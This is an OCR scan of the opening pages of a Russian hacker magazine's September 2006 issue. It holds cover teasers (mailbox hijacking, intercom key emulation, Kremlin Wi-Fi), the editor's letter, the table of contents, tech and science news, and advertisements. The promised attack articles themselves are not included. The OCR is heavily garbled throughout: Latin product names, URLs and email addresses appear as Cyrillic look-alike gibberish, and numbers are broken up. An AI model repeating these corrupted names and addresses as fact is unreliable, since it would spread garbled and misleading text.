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КОМПЬЮТЕРНЫХ 



ХУЛИГАНОВ 




СЕНТЯБРЬ 09(93) 2006 



ЛОМАЕМ 
ЯЩИКИ 
НА ПОЧТЕ. РУ 




ЗЛОСТНЫЙ 
ХАК 

ДОМОФОНОВ 

ДЕЛАЕМ ЭМУЛЯТОР 
Д0М0Ф0НН0Г0 КЛЮЧА 



еМЕРТЕЛЬНЫН 

ВРЕД СВАСК- 
САИТОВ 

СТР. 076 

ЧЕМ ТЫ 

ЗАРАЖАЕШЬСЯ, 

ЗАХОДЯ 

НА КРЯК-САЙТЫ 



ПОЛНЫЙ ДОСТУП К ЧУЖИМ 
АККАУНТАМ 



ВСЕ ТАЙНЫ 
ѴѴІ-ГІ ТОЧЕК 
В КРЕМЛЕ 

БЕСПРОВОДНЫЕ 

ТОЧКИ 

В АДМИНИСТРАЦИИ 
ПРЕЗИДЕНТА 



ИНТЕРНЕТ- 

КАЗИНО 

УЗНАЙ, КАК ОНИ 
ОБМАНЫВАЮТ 



НАСТРАИВАЕМ 
ТАРЕЛКУ 
СРАЗУ НА ДВА 
СПУТНИКА 

ЧТОБЫ ЛОВИТЬ ИНЕТ 
И СМОТРЕТЬ ПОРНУХУ 
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12:36 Зашел за шѵѵш.вирегсгаскв.Іэіі 
12:36 Подцепил трояна ]/Ѵіп32.Вапкег.и 
12:42 Двинул кони 



♦ 





НА ОѴй: 

+ ВЕСЬ СОФТ ДЛЯ ВЗЛОМА ѴѴІРІ 

♦ МІСРЮЗОРТ 50І_ ЗЕВѴЕВ 2005 

♦ СНАОЗ СОМЗТРШСТІОМ’2006 
-> КАТАЛОГ КОДЕРСКИХ 
АЛГОРИТМОВ ДЛЯ СТУДЕНТОВ 



ВСЕ ВОЗМОЖНОСТИ БИОМЕТРИИ 
ТРОЯН ДЛЯ СМАРТФОНОВ НА ЗУМВІАИ 
РЕЗУЛЬТАТИВНАЯ АТАКА ОНЛАЙН-ОБМЕННИКА 
НОВЫЙ ПОДХОД К ПОДЪЕМУ УПАВШЕЙ СИСТЕМЫ 








Хеоп 

і пи'йе’” 



Простаивают компьютеры - 

бездействует компания 



Проверенные временем технологии, 
реализованные в процессорах Іпіеі® Хеоп®, 
на базе которых созданы серверы Эксилон Марг НО, 
позволят Вам обрести спокойствие 
и уверенность в завтрашнем дне/ 



Г арант ия^А го да^у 
Бесплатнаядоставка по Москве А 



Вся продукц ия с ертифицирована 
'(РОСС КІІ.МЕбТ.В04139) 



Заказ серверов: 



ш е-таіІ:іп1Ъ@ехсіІапсІ.ги ѵѵ\лл/ѵ.ехсіІап<±ги е-таіІ:іпі г о@ехсіІапсІ.ги ѵѵѵѵѵѵ.ехсііапсі.ги е-таіІ:іп1Ъ@ехсіІапсІ.ги ѵѵѵѵѵѵ.ехсііапсі.ги е-таіІ:іпТ 



Обозначения Сеіегоп, Сеіегоп Іпзісіе, Сепігіпо, Сепігіпо Іодо, Іпіеі, Іпіеі Соге, Іпіеі Іодо, Іпіеі Іпзісіе, ІпѣеІ Іпзісіе Іодо, Іпіеі ЗреесІЗіер, Іпіеі Ѵііѵ, Іпіеі Хеоп, Ііапіит, Ііапіит Іпзісіе, Соге Іпзісіе, 
Репііит и Репііит Іпзісіе являются товарными знаками, либо зарегистрированными товарными знаками, права на которые принадлежат корпорации Іпіеі или ее подразделениям на 
территории США и других стран. 



Подробная информация на сайте: ѵѵѵѵѵѵ.ехсііапсі.ги 
и по телефону: (495) 727-0231 



КОРПОРАТИВНЫЙ ОТДЕЛ: 

(495) 727-0231; е-таіі: Ь2Ь@ехсіІапсІ.ги 






Сентябрь — коварный месяц. Все лето тебя ничего не парило, 
ты тусовался и отдыхал, а сейчас приходится погружаться в 
процесс учебы, посещать лекции, а то и сдавать экзамены с 
прошлой сессии. Твоему бедному мозгу приходится очень 
тяжело. 

Поэтому мы всеми силами будем помогать тебе влиться в 
учебу. Уже с того месяца начали создавать свой хакерский 
каталог сорцов. Самые часто используемые, самые нужные в 
учебе исходники, которые помогут тебе делать лабы и курсо- 
вые по информатике. 

Каталог лежит на диске, и мы каждый месяц будем его попол- 
нять и улучшать. Ты тоже можешь принять в этом участие. При- 
сылай свои сорцы, лабораторки, курсовики и весь остальной 
учебный стафф на з1исІеп1з@геаІ.хакер.ги . Обещаю тебе, что 
все ценное войдет в наш каталог. 

пікНогг, гл. ред. 



V 
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ЮНИТЫ КОДИНГ ІШІХОІО СЦЕНА ВЗЛОМ РС 20ИЕ РЕВВІШ МЕСАЫЕѴѴЗ 




020 



016 » 

020 » 

024 » 

028 » 



КРАСНО-БЕЛЫЕ КРОССАВЧЕГИ 
КЛЮЧ ОТ ВСЕХ ДВЕРЕЙ 
КО ДИМ ХАРД 
НОВИНКИ 



034 » 
038 » 
044 » 



ПОДЪЕМ РУХНУВШЕЙ ЫТ 

МЕЖПЛАНЕТНЫЕ РЫБОЛОВЫ 

АТАКА НА КРЕМЛЬ, ИЛИ ВОЗДУШНЫЙ БЕСПРЕДЕЛ 




ВОЕННЫЕ ИГРУШКИ НОВОГО ВРЕМЕНИ 



056 » 

052 » 

064 » 

068 » 

072 » 

076 » 

080 » 



ОБЗОР ЭКСПЛОЙТОВ 
НАСК-РАО 

КАК УГНАТЬ ПОЧТОВЫЙ ЯЩИК? 
РЕФЕРАТОВ ЗАХОТЕЛОСЬ? 

ИГРА ПО-ЧЕРНОМУ 

НЕ ВСЕ САЙТЫ ОДИНАКОВО ПОЛЕЗНЫЕ 
ОШЫЕ РАТСНІЫѲ В СЕКРЕТАХ И СОВЕТАХ 



086 » 
090 » 
094 » 
096 » 



1 00 КОМПЬЮТЕРНЫХ ФАКТОВ 
I ПРОФЕССИИ, КОТОРЫЕ МЫ ВЫБИРАЕМ 
^^Их-РРЮРІІ_Е 

РУ ВАП : КАК ЭТО БЫЛО 




114 » 

113 » 

1 22 » 
126 » 



КАЖДОМУ СЕРВИСУ — КРЕЙСЕРНЫЙ ХОД 
ПОД ЗАЩИТОЙ ПЕСОЧНОГО ДЕМОНА 
ПОГРУЖЕНИЕ В ТЕХНИКУ И ФИЛОСОФИЮ (ЗОВ 
ТІРЗ&ТВІСЗ 



128 » 

132 » 

136 » 

142 » 

146 » 



ЖЕЛЕЗОБЕТОННЫЕ ОБЪЕКТЫ: ЭАСІ_ 

СМС-ШПИОНАЖ 

ЖЕСТКИЙ КОДИНГ 

ѴѴЕВ-СЕРВИС ДЛЯ КПК 

ТРЮКИ ОТ КРЫСА 




143 » 

150 » 

160 » 



РАО 

КРЕАТИРР: ГОРОД ХАКЕРОВ 
ДИСКО 
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МІШѴѴОВК 

/МІЫОѴѴОПК@САМЕІ.АЫО.іиі/ 

ЮРИЙ СВИДИНЕНКО «І_А2АВІІ5» 

/ КАММЕВЕВ_МАХ@УАНОО.СОМ / 

СЕРГЕЙ НИКИТИН 




♦ ЗОЛОТЫЕ СМС 



-*• ДВОЙНАЯ ДУМАЛКА 





(1 оГ2) 

І_осаІ Іізіііщз: 
ОІгѵегі ііоз Рі 22а 
235 СапаІ 31 
НеюѴсігк.МѴ 
10013 

(212) 226 9817 



Свой новый комп широкой общественности представила компания 
І_епоѵо. Линейка называется ТНіпкСепіег, представитель которой 
с индексом А60 будет поставляться в двух форм-факторах: Тоѵѵег и 
ЭезкДэр. Его основой станут 64-битные и двуядерные процессоры 
АМЭ, которые будут дополняться памятью типа ООР2. Возможности 
системной платы таковы: интерфейсы РСІ Ехргезз и ЗегіаІАТА-ІІ, 
шесть портов ІІЗВ 2.0. Эти компы изначально оснащаются набором 
дополнительных программ. Например, пакет Везсие апб Ресоѵегу 
позволит тебе самостоятельно восстановить систему после сбоя, вы- 
званного коварным вирусом или собственными кривыми ручонками. 
Если результат отрицательный, то в действие вступит набор утилит 
ТИіпкѴапіаде, который свяжет тебя с технической поддержкой. В 
продаже новинка появится с октября по цене от $750. 



Зря юзеры ругаются на спамеров — мол, они тупые уроды, галимые 
дегенераты и т.д. Вовсе спамеры не тупые, в чем-то даже творческие, 
а где-то и романтики. Мне, например, постоянно приходят письма 
от Оль, Свети Маш, которые заботливо спрашивают: «Здравствуй, 
милый, ты еще не забыл ту нашу ночь? Я вот помню. С тех пор я 
очень изменилась, работаю в модельном агентстве. А здесь можно 
посмотреть мои фотки. До встречи, любимый». И как тут не поддать- 
ся искушению, учитывая то, что ты прекрасно помнишь ту милую 
девочку Олю, и ту незабываемую ночь. Помимо лирических писем, в 
последнее время спамеры заботятся о защищенности своих «клиен- 
тов» . Хит сезона теперь — предложение искоренить спам на своем 
компьютере, послав зтз на указанный номер и получив инструкции 
по удалению адреса из спамерских баз. «Все абсолютно бесплатно. 
Мы просто, как и вы, ненавидим спамеров», — уверяют авторы пред- 
ложений. И, по статистике Лаборатории Касперского, доверчивых 
пациентов находится немало. Только не знают они, что указанный 

телефонный адрес — платный, и 
стоимость отправки зтз на него 
\ в несколько раз превышает 
Ід тарифы обычных зтз-ок. Есть 
1 и другие предлоги отправки 
зтз — для тех, кто жаден 
до «клубнички» или очень 
хочет узнать какую-нибудь 
тайну. 
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Ты много общаешься с друзьями, живешь 25 часов в сутки, 
используешь мобильный на полную? 

Привык разговаривать БМБками и обмениваться ММБками? 
Есть с кем болтать всю ночь? Тогда КЕО - тариф для тебя! 

• Дешевые 5М5 и ММ5 внутри сети МТС 

• Исходящие по очень низкой цене внутри тарифа КЕй 

• Скидка на "ночные разговоры" 

Подробнее о тарифе на ѵѵѵѵѵѵ.тІБ.ги 

О ком ты думаешь сейчас? 

Тариф действует с 5 сентября 2006 г. Подробная информация по номеру 05907, 
а также на сайте и в салонах-магазинах МТС Вашего региона. 





МЕОАЫЕѴѴ5 




» 




-> ШѲІТЕСН 
КОНСОЛИДИРУЕТ 
ВСЮ МУЗЫКУ 



Появилась новая информация по проекту І_одіІесН ѴѴігеІезз Мизіс 
Зузіепп, который передает музыку, хранящуюся на компах, на любой 
музыкальный центр или акустическую систему и управляет всеми 
записями с одного пульта. Соединение планируется производить 
с помощью беспроводной технологии І_одііесб Мизіс АпуѵѵИеге, 
которая позволяет воспроизводить все популярные музыкальные 
форматы. Выглядит это так: передатчик подключается к ІІЗВ-порту 
ПК, а приемник соединяется с музыкальным центром с помощью 
разъема ЯСА или порта для наушников. Радиус действия составляет 
50 метров. Отдельно стоит сказать о пульте. Он имеет ЖК-экран с си- 
ней подсветкой и колесико прокрутки, которые призваны облегчить 
навигацию по твоей немереной коллекции музыки. Имеются функции 
добавления композиции или альбома в очередь без остановки проиг- 
рывания. Пульт подзаряжается от док-станции, а одного полного за- 
ряда хватает на неделю работы. В Европе это чудо появится осенью 
по цене 250 евро. Сколько ждать нам — неизвестно. 




-> РАЗНОЦВЕТНАЯ ПАМЯТЬ 
ТВАЫ8СЕЫ0 

Чтобы холодной и сырой осенью ты не так сильно тосковал по лету, 
компания ТгапзсепсІ выпустила новую линейку разноцветных Лазіп- 
драйвов ОеіРІазІі 1 60. В нее входят устройства емкостью от 51 2 Мб до 
4 Гб, каждое из которых имеет свой цвет. Например, твой друг никог- 
да не сможет пустить тебе пыль в глаза, утверждая, что его красная 
флешка имеет 4 Гб памяти. Потому что красный — это цвет двухги- 
габайтных устройств. Так что, запомнив, какой цвет соответствует 
какому объему, ты сможешь вывести всех на чистую воду. Но, кроме 
цветовой гаммы, у этих устройств есть еще много всего интересного. 
Их можно сделать загрузочным устройством или ключом, который 
блокирует доступ к компу. Также на флешке можно создать особый 
раздел, защищенный паролем. Будет куда прятать приватные фотки! 
Кроме того, эти устройства имеют симпатичный дизайн. 



+ ДНК УСТРОЕНА ЕЩЕ СЛОЖНЕЕ, ЧЕМ СЧИТАЛИ РАНЬШЕ 



Дополнительные «слова», зашифрованные в тех же самых после- 
довательностях оснований ДНК, что несут главную генетическую 
информацию, сумели найти и расшифровать Эран Сигал из израиль- 
ского научного института Вайзманна и Джонатан Уидом из американ- 
ского Северо-западного университета. Уже несколько десятилетий 
был известен первый код ДНК — генетический, который определяет 
все белки, содержащиеся в организме. Второй код, который, по вер- 
сии ученых из Израиля и США, скрыт в виде определенных повторяю- 
щихся последовательностей оснований букв внутри основного кода 
(благо он обладает большой избыточностью), определяет размеще- 
ние на протяжении нити ДНК множества нуклеосом, миниатюрных 
«шпулек» из белка, вокруг которых обвивается петлей сама нить 
ДНК. 

Вокруг одной нуклеосомы ДНК делает 1 ,65 оборота, на что уходит 
всего 1 47 ее «букововок» , из сотен миллионов ее составляющих. А 
поскольку нуклеосомы управляют доступом факторов транскрипции 
(белков, активирующих гены) непосредственно к коду ДНК, получа- 
ется, что позиционирование нуклеосомы в том или ином месте ДНК 
определяют и белки, которые данная клетка сможет синтезировать. 
Авторы работы проанализировали 200 участков генома дрож- 
жей, где присутствуют нуклеосомы, и обнаружили, что там есть 



действительно«скрытый» образец повторяющихся последователь- 
ностей. Поняв этот образец, они оказались в состоянии предсказать 
размещение приблизительно 50% нуклеосом в других организмах. 
Если открытие подтвердится, оно может привести к пониманию всего 
механизма, который позволяет клеткам задействовать нужные для 
них гены, но запрещает им включать гены, предназначенные для 
другого типа клеток. 



0О 

оо 

> ДНК и нуклеосома 
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-» МОНИТОР 

с эмоциями 



Думаю, что даже самый отъявленный компьютерный маньяк, проси- 
живающий за монитором 24 часа в сутки, не относится к нему, как к 
живому существу. Поменять отношение к дисплею, чтобы мы видели 
в нем не бездушную железку, а что-то теплое и близкое нам, решила 
компания І_0. Новая серия ЖК-панелей І_1 900 состоит из трех моде- 
лей: Лаг (кувшин), Піпд (кольцо) и Есіірзе (затмение), различающихся 
формой подставки. Но, кроме дизайнерских изысков, которые долж- 
ны пробудить в нас чувство любви к экрану, в этой серии воплощены 
серьезные технические разработки. Это технология ЭРС, благодаря 
которой уровень контрастности составляет 2000: 1 . Время отклика 
тоже очень приятное (4 мс). Есть возможность настраивать парамет- 
ры дисплея с помощью мыши, а не экранного меню. 




■* ДОКТОР ПРИШЕЛ! 



Тебе не кажется, что пора переходить нелегальное программное 
обеспечение вместо того, чтобы искать крэки и серийники? Если ты 
созрел, то начни с антивирусной защиты. Компания «Доктор Веб» 
выпустила для фанатов своей утилиты новый продукт «Антивирус 
Эг.ѴѴеЬ для ѴѴіпбоѵѵз. Продление лицензии». Предназначен он для тех, 
кто имел лицензию на срок не менее полугода или получил Эг.ѴѴеЬ в 
качестве ОЕМ-решения на своем ПК. Теперь, когда ее срок окончит- 
ся, можно просто пойти в магазин и купить карточку продления, как 
в телефоне, и не связываться со старой и неудобной процедурой. 
Кстати, весьма забавно, каким образом компания поощряет легаль- 
ных пользователей своих продуктов. Называется он «стодневка»: в 
случае продления подлинной лицензии, ты получишь ровно 1 00 дней 
пользования в подарок. Ну а если тебя заела совесть, и ты купил 
продления для какого-нибудь крэкнутого дистрибутива, то срок ле- 
гальной жизни продукта будет на те же 1 00 дней меньше, чем указано 
в договоре. 



-> СЛУШАЕМ 1.6 

Несколько новых плееров нам представляет компания І_0. Модель ЛѴІ53 
может работать с форматами МРЗ, ѴѴМА, ВМР, ЗРЕѲ и МРЕѲ4, а также 
выступать в роли диктофона. Плеер имеет жесткий диск объемом 8 Гб. 
Для управления есть сенсорный тачпад. Тем, кому всего важнее стиль, 
подойдет модель РМ20. Бывают версии с гигабайтом и полугигабай- 
том памяти. Кроме воспроизведения музыки, он записывает сигнал со 
встроенного микрофона и ловит радио в РМ-диапазоне. Причем не прос- 
то ловит, а еще и записать сможет. Последняя модель называется РМЗО. 
Это многофункциональное устройство имеет от 51 2 Мб до 2 Гб встроен- 
ной памяти, работаете форматами МРЗ, ѴѴМА, ВМРфРЕО, МРЕѲ4иТХТ, 
которые демонстрируются на ЖК-экране с большими углами обзора. А 
аккумулятор обеспечивает работу плеера в течение 60 часов. 





-> старый добрый оерсои 



В очередной раз в Лас-Вегасе прошла крупнейшая хакерская кон- 
ференция Эеісоп. С 4 по 6 августа в ней приняли участие более 6 ты- 
сяч специалистов из разных стран, которые вместе тусили, читали и 
слушали доклады, принимали участие в различных конкурсах и пили 
галлоны пива. Конкурсы уже стали неотъемлемой частью конфы, и 
здесь хакеры могут не опасаться, что их арестуют. Проявить свои 
таланты можно было в нескольких номинациях: скоростной взлом 
замков, соревнование самодельных роботов на поражение целей, 
лучший слоган (победитель в этой номинации — автор фразы: «Об- 
щество меня не понимает, а технология меня боится»), выпивание 
кофе на скорость. А главным событием стало 3-дневное состязание 
между хакерами по захвату серверов оппонентов и содержащейся 
там инфы. Например, нужно было хакнуть микрочип на бэйдже, 
полученным каждым участником пати. Докладов было подготовлено 
около 1 00, их авторы — как малоизвестные хакеры, так и просла- 
вившиеся специалисты в области компьютерной безопасности. 
Обсуждали анонимность в онлайне, изготовление универсальных 
ключей к дверным замкам, вопросы организации секурных каналов 
связи, разные тонкости расследования компьютерных преступлений 
и многое другое. В общем, было весело. Более подробно о прошед- 
шей конференции ты можешь почитать на ее официальном сайте: 
ѵѵѵѵѵѵ.сіеісоп.ога . 
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Товар сертифицирован 



МЕѲАЫЕѴѴЗ 



-> ФОТОПЛЕЕРЫ 5АМ5ЦИ6 




Компания Затзипд представила новую линейку фотоаппаратов І\ІѴ: 
модели ЫѴЗ, І\1Ѵ7 и ЫѴ10. Первая модель имееттонкий (1 7,5 мм) корпус 
из нержавейки, разрешение 7,2 мегапикселя и функции плеера (для 
фотографий, видео и музыки). Семерочка имееттакое же разрешение, 
и, кроме того, 7-кратный зум-объектив марки 8сІіпеісІег-КЯЕІІ2МАСН. 
Дополняют картину встроенная поднимающаяся вспышка и система 
оптической стабилизации изображения ОРЗ. Последняя камера, 

ІМѴ10, помещена в алюминиевый корпус толщиной 18,5 мм, обладает 
разрешением 1 0, 1 мегапикселя, в ней есть поднимающаяся вспышка и 
3-кратный зум-объектив. Все камеры объединяет встроенный редактор 
снимков и использование карт ЗЭ/ММС в качестве хранилища данных. 



-► УПРАВЛЕНИЕ СПЕЦИАЛЬНЫХ ТЕХНИЧЕСКИХ 
МЕРОПРИЯТИЙ ГУВД ПРЕДУПРЕЖДАЕТ. . . 



На сайте Народ. ру (бесплатном хостинге, принадлежащем компании 
Яндекс) была найдена уязвимость — возможность исполнения рНр- 
скриптов. Этой уязвимостью попытался воспользоваться молодой 
москвич для того, чтобы получить доступ к базе данных пользовате- 
лей Народа. Все пароли пользователей, разумеется, хранятся в хэ- 
шированном виде, однако доступ к базе дает потенциальную возмож- 
ность вскрытия простых (словарных) паролей путем подбора, кроме 
того, эту базу можно пытаться использовать для спам-рассылок, 
всевозможной социальной инженерии и тому подобных некрасивых 
и даже противозаконных деяний. Действия хакера вызвали срабаты- 
вание системы мониторинга серверов, и системные администраторы 



Яндекса сразу отреагировали — уязвимость была закрыта, а следы 
действий взломщика были сохранены. Сотрудники Управления 
специальных технических мероприятий ГУВД г.Москвы зафиксиро- 
вали факт неправомерного доступа к компьютерной информации. В 
течение нескольких дней личность хакера была установлена, и на- 
чалась подготовка к возбуждению уголовного дела по статьям 272 и 
273 Уголовного Кодекса РФ. Вскоре после случившегося сотрудники 
службы безопасности Яндекса смогли посмотреть в глаза молодому 
человеку, написавшему чистосердечное признание. На этот раз все 
кончилось мирно, и дело возбуждать не стали. Однако МВД предуп- 
реждает: нарушение статей УК опасно для здоровья. 



Печать на отлично. 
Экономим прилично. 

ѴІ Принтер - сканер - копир в одном устройстве 
Раздельные картриджи 

Доступная цена картриджей - всего по 270 руб.* 
ѵ] Набор картриджей - экономия до 20% 
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Многофункциональные устройства Ерзоп предлагают экономичную печать дома. Превосходное качество печати как 
текстов на обычной бумаге, так и фотографий на фотобумаге, возможность копирования и печати без компьютера. 



Подробности на ѵѵѵѵѵѵ.ерзоп.ги 



ОТ 

2970 руб. 

* Рекомендованная розничная цена 



всего 

по 270 руб. 



экономия 
до 20% 



четкий 

текст! 



отличные 

фотографии! 



МОСКВА: М. Видео (495) 777-777-5, 8 (800) 777-777-5, Компания МИР (495) 780-00-00, РОЬАПІЗ (495) 7-55555-7, СтартМастер (495) 785-85-55, Техносила (495) 777-8-777, ЭЛЬДОРАДО (495) 5000000, СШ 
(495) 105-07-00, 232-3009, 1Л.ТВА ЕІесігопісз (495) 775-75-66, Р-Сепіег (495) 105-64-47, Группа компаний ЦЗЫ (495) 775-82-02. С.-ПЕТЕРБУРГ: КЕЙ (812) 074, Компьютерный Мир (812) 333-00-33, Цифры 320-80-80 
(812) 320-8080, Мир Техники (812) 331-22-22, 325-2387, Гипермаркет «Матрица» (812) 441-22-22, Свега плюс (812) 113-03-25, 323-93-83, РиК-Компьютерс (812) 327-34-10, Аксесс + (812) 317-96-07, 317-93-34, Калинка 
(812) 320-80-80, Алкор (812) 542-19-76, М-Сервис (812) 331-04-35, 324-22-14 



На правах рекламы 




МЕОАІМЕѴѴ5 




» 

-» АЛМАЗОИДЫ НЕ ЗА 
ГОРАМИ 



Специалисты компании Моіесиіаг ОіатопсІ ТесІгпоІодіез, дочернего 
отделения нефтехимического гиганта СІтеѵгоп, совместно с учеными 
из Стэнфорда приступили к промышленному освоению нового класса 
материалов — наноалмазов, названных «алмазоидами» (сііатопсіоісіз). 
Партнеры объявили о старте научно-исследовательской программы, 
призванной детально изучить свойства этих объектов, а также наладить 
промышленное получение алмазоидов из нефти. 

Алмазоиды — это углеродные молекулы, имеющие много «подвидов», 
отличающихся формой и размерами, составленные из десятков (неко- 
торые типы — сотен) атомов, расположенных сходно с кристалличес- 
кой решеткой алмаза, также способные соединяться с другими атомами 
и включать их в свою решетку. 

Впервые такие наноалмазы выделили из нефти в далеком 1 933 году, 
однако именно теперь ученые подошли (с современной аппаратурой) к 
возможности на атомарном уровне выявить все их необычные свойства, 
а главное — наладить массовое производство и использование. К тому 
же химики СИеѵгоп научились синтезировать такие молекулы по жела- 
нию — любой заданной структуры и атомной массы. 

Ученые отмечают, что обычный кристалл алмаза фактически является 
макромолекулой, но предлагают именовать «молекулами алмаза» 
именно алмазоиды, которым прочат будущее важных кирпичиков в 
нанотехнологических изделиях. 

В рамках новой программы специалисты СИеѵгоп приступили к раз- 
личным физическим и химическим опытам с этими нанокристаллами, 
отмечая, что переход к наномасштабу для, казалось бы, известного 
углерода в форме алмаза означает и заметное изменение его «элект- 
ронных» свойств. 




И О О лт 



> Модель алмазоидной поверхности 



-» БЕСПРОПЕЛЛЕРНЫЙ ЧЕРНЫЙ ВЕРТОЛЕТ 
ДЛЯ ГОРОДСКИХ НУЖД 



Многие мечтали о воздушном такси. Похоже, что первый рабочий 
экземпляр уже есть. И это не только такси, а еще и боевая патрулиру- 
ющая машина, способная ездить по земле. Фантастика? Отнюдь! 

На известном авиашоу в Фарнборо в павильоне компании ВеІІ 
Неіісоріег был представлен вертолет-гибрид Х-Наѵѵк РапсгаЙ. 
Компании ВеІІ Неіісоріег и ВІгбап Аегопаиіісз в прошлом году сотруд- 
ничали, чтобы получить финансирование американского правитель- 
ства для развития военной версии Х-Наѵѵк с целью ее использования, 
прежде всего, в качестве боевого транспортно-десантного аппарата. 
Над публикой с массивного постамента нависал хищного вида чер- 
ный аппарат с двумя шестиствольными пушками М61 Ѵиісап калибра 
20 мм. Заявленные «авиационной» прессой размеры этой, разуме- 
ется, нелетающей модели — 8,2 метра, ширина — 4 метра, а высота 
— 3,3 метра (хотя на снимках кажется, что «Хоук» поменьше; может, 
все-таки размеры прежние — 4,7 х 2,5 метра?). Это какие-никакие 
факты, а остальное, вообще, — сплошь теория. 

По последним оценкам, такой вот Х-Наѵѵк мог бы летать с максималь- 
ной скоростью 250 км/час на высоте примерно 3,5 км, неся на себе 
1362 кг полезного груза («Хоук», по идее, должен будет вмещать 1 1 
бойцов и одного пилота). Вес самой машины — около 2 тонн. 

Раньше такого не было, но отныне ожидается, что аппарат сможет и 
ездить по улицам на скоростях 16-19 км/час. 




>Вертолет Х-Наѵѵк 
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МЕѲАЫЕѴѴЗ 



-> КРУЖОЧКИ В ЕІ\І О 

Компания ВепО выпускает СЭ/ЭѴЭ собственного производства. 
Особенностью дисков является фирменная технология ЭаіаОиагсІ, 
которая благодаря золотому записывающему слою, усиленной 
подложке и покрытию, устойчивому к ультрафиолетовому излуче- 
нию, может сохранять твои данные аж сотню лет! Это что касается 
СЭ. А ЭѴЭ-болванки оснащены технологией ЭаІаОиагсІ X: отража- 
ющий слой из сплава серебра, усовершенствованный записываю- 
щий слой, усиленная подложка с анти-УФ покрытием и бесшовная 
технология склеивания. Также в них применяется технология РісРесі, 
снижающая вероятность ошибок. Диски выпускаются разные: с 
возможностью печати на внешней стороне, музыкальной (в виде 
виниловых дисков) и спортивной (с изображением футбольного 
мяча) серий. 



-> ТОНКИЕ И БЫСТРЫЕ 

Известная всем нам своими оптическим накопителями компания 
ѴегЬаііт приготовила для нас новинку — ЭЗВ-накопители серии 
ЗІітІіпе, обладающие новым дизайном и увеличенной скоростью ра- 
боты. Размер составляет 78x20x7 мм, а поверхность защищена про- 
резиненными покрытием, которое не дает устройству выскользнуть 
из твоих вспотевших ладошек. Входящий в линейку накопитель Зіоге 
'п' Оо 1)3 Зтаіі Эгіѵе снабжается набором программ, который ты 
сможешь использовать на любом компе, сохранив свои настройки. 





Он включает в себя утилиту резервного 
копирования Роѵѵег Васкир, синхрониза- 
тор Мідо, приложение для чтения 2іпіо, 
почтовый клиент МогіІІа ТІпипсІегЬігсІ с 
антивирусом и фильтрами для спама, а 
также графический редактор АСЭЗее РГюІо 
Мападег и программу для защиты паролем Разз20о. 
Максимальная емкость новинок составляет 4 Гб. 
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АКЦИЯ 




Купи любую акустическую систему ЗѴЕМ, пришли серийный 
номер 8 М 8 -с 00 бщением вида на короткий 

номер 7015 и получи доступ к мобильными картинкам и 
рингтонам, созданным специально для тебе, а также шанс 
стать обладателем одного из 2500 подарков! Выигрывает 
каждое 3-е 5МВ -сообщение! 

* Акция действительна с 18 сентября по 31 октября 2006 года. 

* Стоимость 5т$-соо&щония 0,15 у.е. но учитывая налоги. 



шѵлм.зѵеп.ги 

Товар сертифидироад* 
Ня прлвлх рекламы. 
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-► ЛУННАЯ А ТАКА ЯПОНЦЕВ НАЗНА ЧЕНА НА 2020 ГОД 




> Примерно так будут жить на луне первые поселенцы 

Строительство японской базы для людей на Луне будет завершено к 
2030 году. Об этом на конференции в Токио заявили представители 



японского агентства по освоению аэрокосмического пространства 
фАХА), заметив, однако, что денег на этот амбициозный проект еще 
не выделено. Ранее японцы говорили, что лунная база появится к 
2025 году, и заселят ее человекоподобные роботы. Теперь же андро- 
иды отодвинуты на второй план, а в авангард вырываются люди. 

То, что на проект пока не выделили средств, не является камнем 
преткновения. Работы по его осуществлению уже начались. В сле- 
дующем году ЗАХА собирается отправить на лунную орбиту спутник, 
сопровождаемый беспилотным космическим кораблем, который 
приземлится на Луне и соберет образцы. Астронавты отправятся 
туда примерно к 2020 году и начнут строительство базы, которое 
будет закончено за 1 0 лет. «Выполнимость этого плана пока неясна 
только потому, что мы должны получить одобрение правительства и 
народа, но технологически все это возможно через несколько деся- 
тилетий» , — отметил представитель агентства Сатоки Курокава. 
Сомневаться в стремлении сверхдержав захватить Луну не прихо- 
дится: на карту поставлено владение ценнейшим энергоресурсом 
— гелием-3, который в избытке содержится в лунной коре. 



іпОаіе 



* ворота в мозг 




Ученые долгое время работают над имплантатами, помогающими 
парализованным людям или инвалидам с расстройством функций 
спинного мозга. Недавно уже был продемонстрирован имплантат, 
позволяющий инвалиду «мысленно» управлять своей коляской. Те- 
перь ученые пошли дальше: с помощью чипа ВгаіпОаіе от компании 
СуЬегкіпеіісз они хотят еще больше облегчить жизнь больным людям. 
Принцип действия имплантата ВгаіпОаіе прост: сигналы, которые 
формируются в мозге, передаются через сенсор — квадратную 
пластинку четыре на четыре миллиметра с сотней крошечных элек- 
тродов. Эти электроды представляют собой крошечные миллимет- 
ровые металлические иголочки, проникающие непосредственно в 
кору мозга. 

Этот сенсор контактируете моторной зоной коры головного мозга, 
отвечающей за движение левой руки, и соединяется с разъемом, 
укрепленным в отверстии в черепной коробке. При попытке совер- 
шить какое-то движение в моторной зоне возникает электрический 
импульс, который передается через вживленные электроды в 
компьютер. 

Первым в мире человеком с мозговым имплантатом и стал 25-лет- 
ний Мэттью Нейгл. С помощью вживленного устройства он получил 
возможность управлять курсором на экране, 
читать электронную почту, играть в неслож- 
ные видеоигры и даже что-то рисовать. 

Еще он научился переключать каналы и 
громкость телевизора и шевелить элект- 
ромеханической рукой (наподобие ЕМАЗ, 
только та рука получала сигналы не от 
мозга, а от мышц), ни сделав для этого ни 
одного движения. 

Многие специалисты считают, что сей- 
час такая аппаратура слишком далека 
от внедрения в клиническую практику. 
Поэтому СуЬегкіпеІісз придется еще 
разобраться, стоит ли датчик разме- 
щать именно в двигательной коре, 
и как сделать его более удобным и 
функциональным. 



+ ЖИДКАЯ БРОНЯ 
НА ПОЛЕ ВОЯ 

Вскоре на вооружении многих стран может появиться обмундиро- 
вание нового типа, способное защитить все тело солдат лучше, 
чем современные кевларовые бронежилеты. Совместные усилия 
нескольких исследовательских лабораторий под управлением 
Министерства обороны США привели к появлению удобной и гибкой 
бронезащиты нового типа, называемой «жидкой броней». 

Новая «жидкая броня» позволяет защищать любые участки тела и 
может сгибаться, не теряя при этом своих защитных свойств. 

Ученым удалось достичь такого удивительного эффекта благодаря 
специальному пакету из кевлара, наполненного раствором сверх- 
твердых наночастиц в неиспаряющейся жидкости. Как только про- 
исходит механическое давление высокой энергии на кевларовую 
оболочку, наночастицы собираются в кластеры, изменяя при этом 
структуру раствора жидкости, который превращается в твердый 
композит. Этот фазовый переход происходит менее чем за милли- 
секунду, что и позволяет защитить солдат не только от ножевого 
удара, но и от пули или осколка. При обычной эксплуатации (в об- 
ласти низких энергий) броня ведет себя как обычная жидкость, что и 
позволяет наполнить ею кевларовую оболочку защитной «рубашки» 
